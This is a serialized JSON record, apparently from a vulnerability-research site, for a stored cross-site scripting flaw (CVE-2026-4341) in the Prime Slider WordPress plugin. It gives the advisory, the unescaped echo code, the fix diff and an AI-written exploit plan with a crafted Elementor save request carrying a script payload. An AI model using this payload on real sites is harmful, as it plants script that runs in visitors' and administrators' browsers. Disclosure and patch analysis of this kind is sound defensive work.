[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fnuEGBPp1yc0By28UixV0ifbjG586ORzsB_V--K0RPLM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-4341","prime-slider-authenticated-contributor-stored-cross-site-scripting-via-followustext-parameter","Prime Slider \u003C= 4.1.10 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'follow_us_text' Parameter","The Prime Slider – Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'follow_us_text' setting of the Mount widget in all versions up to, and including, 4.1.10. This is due to insufficient input sanitization and output escaping. Specifically, the `render_social_link()` function in `modules\u002Fmount\u002Fwidgets\u002Fmount.php` outputs the `follow_us_text` Elementor widget setting using `echo` without any escaping function. The setting value is stored in `_elementor_data` post meta via `update_post_meta`. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","bdthemes-prime-slider-lite",null,"\u003C=4.1.10","4.1.11","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-07 15:20:50","2026-04-08 03:36:08",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F4a2ef416-4354-4e09-b9be-e36c1f655110?source=api-prod",1,[22,23,24,25,26,27,28,29],"admin\u002Fassets\u002Fcss\u002Fproduct-feed.css","admin\u002Fassets\u002Fcss\u002Fproduct-feed.rtl.css","admin\u002Fassets\u002Fjs\u002Fps-admin.js","bdthemes-prime-slider.php","modules\u002Fgeneral\u002Fwidgets\u002Fgeneral.php","modules\u002Fmount\u002Fwidgets\u002Fmount.php","readme.txt","traits\u002Fquery-controls\u002Fselect-input\u002Fdynamic-select-input-module.php","researched",false,3,"This research plan outlines the steps required to verify and exploit the Stored Cross-Site Scripting (XSS) vulnerability in the **Prime Slider – Addons for Elementor** plugin (CVE-2026-4341).\n\n---\n\n### 1. Vulnerability Summary\n* **Vulnerability:** Stored Cross-Site Scripting (XSS)\n* **Affected Parameter:** `follow_us_text` (setting within the Mount widget)\n* **Vulnerable Function:** `render_social_link()` in `modules\u002Fmount\u002Fwidgets\u002Fmount.php`\n* **Sink:** `echo` statement without escaping.\n* **Reason:** The plugin fails to sanitize the `follow_us_text` input when saved via Elementor and fails to escape it when rendering the widget on the frontend.\n* **Required Permissions:** Authenticated (Contributor-level or higher) with access to the Elementor editor.\n\n### 2. Attack Vector Analysis\n* **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n* **Action:** `elementor_ajax` (internal action: `editor_post_save`)\n* **Payload Location:** The `follow_us_text` key within the `settings` object of a widget of type `prime-slider-mount`.\n* **Preconditions:**\n 1. The attacker must have permissions to edit a post with Elementor (Contributor+).\n 2. The \"Mount\" widget must be added to the post.\n 3. The `show_social_share` setting must be set to `yes` (default).\n\n### 3. Code Flow\n1. **Input:** A user with Contributor+ access edits a post using Elementor and adds a **Mount** widget (`prime-slider-mount`).\n2. **Storage:** When the user saves the post, Elementor sends a request to `admin-ajax.php` with `action=elementor_ajax`. The widget data is stored in the `_elementor_data` post meta.\n3. **Processing:** In `modules\u002Fmount\u002Fwidgets\u002Fmount.php`, the `follow_us_text` control is registered using `Controls_Manager::TEXT`.\n4. **Rendering:** When the post is viewed, the Elementor renderer instantiates the `Mount` class and calls its `render()` method.\n5. **Sink:** The `render()` method calls `render_social_link()` (or uses the setting directly in the template). Based on the vulnerability report, `render_social_link()` outputs the value:\n ```php\n \u002F\u002F modules\u002Fmount\u002Fwidgets\u002Fmount.php (inferred logic)\n protected function render_social_link() {\n $settings = $this->get_settings_for_display();\n if ( ! empty( $settings['follow_us_text'] ) ) {\n echo '\u003Cspan class=\"some-class\">' . $settings['follow_us_text'] . '\u003C\u002Fspan>'; \u002F\u002F VULNERABLE SINK\n }\n }\n ```\n\n### 4. Nonce Acquisition Strategy\nTo save Elementor widget data via the API, a valid Elementor AJAX nonce is required.\n\n1. **Create Post:** Create a new draft post as a Contributor.\n2. **Navigate to Editor:** Use `browser_navigate` to visit the Elementor editor URL for that post: `wp-admin\u002Fpost.php?post=[POST_ID]&action=elementor`.\n3. **Extract Nonce:** Use `browser_eval` to extract the nonce from the `elementorConfig` object:\n * `browser_eval(\"window.elementorConfig?.ajax?.nonce\")`\n4. **Alternative:** The nonce can also be found in the HTML source of the editor page inside a script block defining `elementorConfig`.\n\n### 5. Exploitation Strategy\nThe exploit involves sending a crafted `elementor_ajax` request to inject the XSS payload.\n\n**Step 1: Save Malicious Widget Data**\n* **URL:** `http:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin-ajax.php`\n* **Method:** `POST`\n* **Content-Type:** `application\u002Fx-www-form-urlencoded`\n* **Parameters:**\n * `action`: `elementor_ajax`\n * `_nonce`: `[Extracted Elementor AJAX Nonce]`\n * `actions`: A JSON string representing the save action.\n ```json\n {\n \"editor_post_save\": {\n \"action\": \"editor_post_save\",\n \"data\": {\n \"id\": [POST_ID],\n \"status\": \"draft\",\n \"elements\": [\n {\n \"id\": \"exploit-section\",\n \"elType\": \"section\",\n \"elements\": [\n {\n \"id\": \"exploit-column\",\n \"elType\": \"column\",\n \"elements\": [\n {\n \"id\": \"exploit-widget\",\n \"elType\": \"widget\",\n \"widgetType\": \"prime-slider-mount\",\n \"settings\": {\n \"follow_us_text\": \"Follow Us \u003Cscript>alert(document.domain)\u003C\u002Fscript>\",\n \"show_social_share\": \"yes\",\n \"slides\": [\n {\n \"title\": \"Slide 1\",\n \"sub_title\": \"Test\"\n }\n ]\n }\n }\n ]\n }\n ]\n }\n ]\n }\n }\n }\n ```\n\n**Step 2: Trigger the XSS**\n* Navigate to the frontend view of the post: `?p=[POST_ID]`.\n* The payload will execute automatically in the browser of any user (including Administrators) who views the page.\n\n### 6. Test Data Setup\n1. **User:** Create a user with the `contributor` role.\n2. **Post:** Create a draft post (`post_type=post`) and note the ID.\n3. **Plugin Config:** Ensure **Prime Slider** is active and the **Mount** widget is enabled in the plugin settings (it is usually enabled by default).\n\n### 7. Expected Results\n* The `editor_post_save` request should return a `200 OK` with a JSON response containing `\"success\": true`.\n* When viewing the post, the HTML source should contain:\n `\u003Cspan>Follow Us \u003Cscript>alert(document.domain)\u003C\u002Fscript>\u003C\u002Fspan>`\n* A browser alert box should appear showing the site domain.\n\n### 8. Verification Steps\n1. **Database Check:** Use WP-CLI to check the `_elementor_data` meta for the post:\n `wp post meta get [POST_ID] _elementor_data`\n Verify that the `follow_us_text` field contains the `\u003Cscript>` tag.\n2. **Frontend Check:** Fetch the post content and grep for the payload:\n `http_request('GET', 'http:\u002F\u002F[target]\u002F?p=[POST_ID]')`\n Grep for `Follow Us \u003Cscript>alert`.\n\n### 9. Alternative Approaches\n* **REST API:** Elementor also supports saving via the REST API if the AJAX method is restricted. The endpoint is `\u002Fwp-json\u002Felementor\u002Fv1\u002Fglobals\u002F`.\n* **Other Widgets:** The vulnerability description suggests the `render_social_link()` function is at fault. If this function is shared (via a trait like `Global_Widget_Controls` mentioned in the source), other widgets in the Prime Slider plugin may also be vulnerable to the same payload in the `follow_us_text` parameter. Check widgets like `Isolate` or `Blog` if they use similar social share features.","The Prime Slider – Addons for Elementor plugin is vulnerable to Stored Cross-Site Scripting (XSS) via the 'follow_us_text' and 'general_follow_us_text' parameters in the Mount and General widgets. This occurs because the plugin echoes user-supplied settings without proper sanitization or output escaping, allowing authenticated attackers with Contributor-level access or higher to inject malicious scripts into pages.","\u002F\u002F modules\u002Fgeneral\u002Fwidgets\u002Fgeneral.php line 2589\n\u003Ch3>\n\t\u003C?php\n\techo $settings['general_follow_us_text']\n\t\t? $settings['general_follow_us_text']\n\t\t: esc_html__( 'Follow Us', 'bdthemes-prime-slider' );\n\t?>\n\u003C\u002Fh3>\n\n---\n\n\u002F\u002F modules\u002Fmount\u002Fwidgets\u002Fmount.php line 1026\n\u003Ch3>\n\t\u003C?php echo $settings['follow_us_text'] ? $settings['follow_us_text'] : esc_html__('Follow Us', 'bdthemes-prime-slider') ?>\n\u003C\u002Fh3>","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbdthemes-prime-slider-lite\u002F4.1.10\u002Fmodules\u002Fgeneral\u002Fwidgets\u002Fgeneral.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbdthemes-prime-slider-lite\u002F4.1.11\u002Fmodules\u002Fgeneral\u002Fwidgets\u002Fgeneral.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbdthemes-prime-slider-lite\u002F4.1.10\u002Fmodules\u002Fgeneral\u002Fwidgets\u002Fgeneral.php\t2026-03-08 09:23:36.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbdthemes-prime-slider-lite\u002F4.1.11\u002Fmodules\u002Fgeneral\u002Fwidgets\u002Fgeneral.php\t2026-03-29 05:17:28.000000000 +0000\n@@ -2589,7 +2589,7 @@\n \t\t\t\t\t\u003Ch3>\n \t\t\t\t\t\t\u003C?php\n \t\t\t\t\t\techo $settings['general_follow_us_text']\n-\t\t\t\t\t\t\t? $settings['general_follow_us_text']\n+\t\t\t\t\t\t\t? esc_html($settings['general_follow_us_text'])\n \t\t\t\t\t\t\t: esc_html__( 'Follow Us', 'bdthemes-prime-slider' );\n \t\t\t\t\t\t?>\n \t\t\t\t\t\u003C\u002Fh3>\n\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbdthemes-prime-slider-lite\u002F4.1.10\u002Fmodules\u002Fmount\u002Fwidgets\u002Fmount.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbdthemes-prime-slider-lite\u002F4.1.11\u002Fmodules\u002Fmount\u002Fwidgets\u002Fmount.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbdthemes-prime-slider-lite\u002F4.1.10\u002Fmodules\u002Fmount\u002Fwidgets\u002Fmount.php\t2026-03-08 09:23:36.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbdthemes-prime-slider-lite\u002F4.1.11\u002Fmodules\u002Fmount\u002Fwidgets\u002Fmount.php\t2026-03-29 05:17:28.000000000 +0000\n@@ -1024,7 +1024,7 @@\n \t\t\t\u003Cdiv \u003C?php $this->print_render_attribute_string('social-icon'); ?>>\n \n \t\t\t\t\u003Ch3>\n-\t\t\t\t\t\u003C?php echo $settings['follow_us_text'] ? $settings['follow_us_text'] : esc_html__('Follow Us', 'bdthemes-prime-slider') ?>\n+\t\t\t\t\t\u003C?php echo $settings['follow_us_text'] ? esc_html($settings['follow_us_text']) : esc_html__('Follow Us', 'bdthemes-prime-slider') ?>\n \t\t\t\t\u003C\u002Fh3>\n \n \t\t\t\t\u003C?php $this->render_social_link_repeater(); ?>","The exploit requires an attacker to have Contributor-level permissions or higher to access the Elementor editor. The attacker creates or edits a post using Elementor and adds either the 'Mount' or 'General' widget. They then input a malicious script into the 'Follow Us Text' field (parameter `follow_us_text` or `general_follow_us_text`). When the post is saved, Elementor sends an AJAX request (`elementor_ajax` action with `editor_post_save`) that stores the payload in the post's `_elementor_data` meta field. Because the plugin outputs this value directly using `echo` without escaping on the frontend, the script will execute in the browser of any user who views the affected post.","gemini-3-flash-preview","2026-04-17 20:46:37","2026-04-17 20:47:02",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","4.1.10","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbdthemes-prime-slider-lite\u002Ftags\u002F4.1.10","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbdthemes-prime-slider-lite.4.1.10.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbdthemes-prime-slider-lite\u002Ftags\u002F4.1.11","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbdthemes-prime-slider-lite.4.1.11.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbdthemes-prime-slider-lite\u002Ftags"]